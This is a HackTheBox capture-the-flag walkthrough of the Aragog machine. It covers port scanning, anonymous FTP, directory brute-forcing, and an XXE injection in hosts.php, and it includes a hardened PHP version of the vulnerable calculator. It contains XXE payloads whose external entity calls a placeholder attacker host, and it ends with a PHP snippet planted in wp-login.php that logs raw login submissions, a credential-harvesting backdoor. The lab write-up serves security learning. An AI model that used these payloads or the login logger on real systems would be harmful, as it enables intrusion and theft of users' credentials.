HackTheBox - Aragog Walkthrough

Aragog

1. Recon and Information gathering

Machine name: Aragog
IP: 10.10.10.78
OS: Linux

Nmap

nmap -A 10.10.10.78 -oN base.nmap

Nmap scan report for 10.10.10.78
Host is up (0.13s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.8
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul  5 14:34:23 2018 -- 1 IP address (1 host up) scanned in 12.46 seconds

SSH

SSH is running on the default port and the scan shows nothing else of interest. Connecting shows that it accepts only public-key authentication, not passwords:

ssh root@10.10.10.78
root@10.10.10.78: Permission denied (publickey).

FTP

A quick check of the version turns up no known vulnerabilities, but anonymous login is allowed and there is one file, test.txt, which we can read:

<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>

That is all FTP gives us for now, so we move on to the remaining exposed service.

HTTP

First let’s see what is available at / on the web server:

curl 10.10.10.78 -s | grep title
<title>Apache2 Ubuntu Default Page: It works</title>

Nothing interesting, just the default page of an Ubuntu Apache installation. Next step: directory brute-forcing. We’ll start with a small list and a few basic extensions; if nothing interesting turns up we can expand the search with a bigger wordlist:

gobuster -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.78 -t 50 -x txt,php,xml

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.78/
[+] Threads      : 50
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions   : .txt,.php,.xml
=====================================================
/hosts.php (Status: 200)
/index.html (Status: 200)
---------------------------------------

Only one PHP file is found with that list. Its content:

curl http://10.10.10.78/hosts.php

There are 4294967294 possible hosts for 

Seeing 4294967294 next to “possible hosts” should point our thinking towards IPv4 addresses (it did for me):

IPv4 uses 32-bit addresses, and with 32 bits the maximum number of addresses is 2^32, or 4,294,967,296.

Taking away one address for the network and one for broadcast gives exactly the number the page printed. Looking back at test.txt, the subnet mask in it should be our next pointer, so let’s use the two together:

curl -X POST http://10.10.10.78/hosts.php -d @test.txt

The application calculates the number of possible hosts for the provided netmask:

(curl output shown as an image in the original post)

So we now know how to interact with the application. Since it takes XML input, our first check should be for XXE (XML External Entity injection).

2. Vulnerability Testing

As a start, let’s run a Python web server on our attacking machine so we can observe any callback:

python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Next, create a file with our test payload for the app; we’ll call it xxe_test.xml:

<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://OUR.ATTACK.MACHINE.IP" >]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>

Send it to the web app with curl:

curl http://10.10.10.78/hosts.php -X POST -d @xxe_test.xml

Then check the Python server for a callback:

There are 4294967294 possible hosts for 

10.10.10.78 - - [29/Jul/2018 03:07:19] "GET / HTTP/1.0" 200 -

Bingo! The server resolved our external entity and fetched it from our machine, so we have a foothold on the remote host. Let’s see what exactly is available to us.
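For contrast with the behaviour just observed, here is a hardened version of the subnet-mask calculator that this box’s hosts.php implements. This is an added example written for this walkthrough, not the box’s own code; it handles the same <details> document from test.txt, but refuses DOCTYPE and entity declarations and disables network access in the parser, so the &xxe; probe above is rejected instead of resolved. The ATTACKER.IP placeholder in the sample probe is constructed.

```php
<?php
// Added example: hardened subnet-mask calculator (not the box's hosts.php).
declare(strict_types=1);

function possibleHosts(string $xml): string
{
    // Disable the external entity loader on PHP < 8.0 (already the default in 8.x).
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);

    // The calculator has no legitimate need for a DTD, so reject any document
    // that declares one before the parser ever sees it.
    if (preg_match('/<!DOCTYPE|<!ENTITY/i', $xml)) {
        return 'Error: DTDs are not accepted';
    }

    // LIBXML_NONET forbids network access while parsing; LIBXML_NOENT is
    // deliberately NOT set, so entity references are never substituted.
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET | LIBXML_NOCDATA);
    if ($doc === false || !isset($doc->subnet_mask)) {
        return 'Error: invalid input';
    }

    $mask   = trim((string) $doc->subnet_mask);
    $packed = ip2long($mask);
    if ($packed === false) {
        return 'Error: invalid subnet mask';
    }

    // Host bits are the zero bits of the mask; drop the network and broadcast addresses.
    $hostBits = 32 - substr_count(sprintf('%032b', $packed), '1');
    $hosts    = max((2 ** $hostBits) - 2, 0);

    return "There are $hosts possible hosts for $mask";
}

// Constructed sample inputs: the benign test.txt document and the XXE probe from above.
$benign = '<details><subnet_mask>255.255.255.192</subnet_mask><test></test></details>';
$probe  = '<!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://ATTACKER.IP" >]>'
        . '<details><subnet_mask>&xxe;</subnet_mask><test></test></details>';

echo possibleHosts($benign), "\n";
echo possibleHosts($probe), "\n";
```

The first call reports the 62 hosts of a /26 network; the second is refused before parsing, so no request ever leaves the server.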

  • XXE testing
  • XXE fixes/avoidance

3. Exploitation

  • XXE exploitation
  • Gaining user access

4. Privilege Escalation

  • Internal enumeration
  • Wordpress
  • Permissions
  • Getting admin credentials through logging Wordpress login form
  • r00tz

Edit wp-login.php:

vim /home/myserverlab/public_html/logger/wp-login.php

Output:

<?php
$entityBody = file_get_contents('php://input');
file_put_contents('admin.logger', $entityBody . "\n");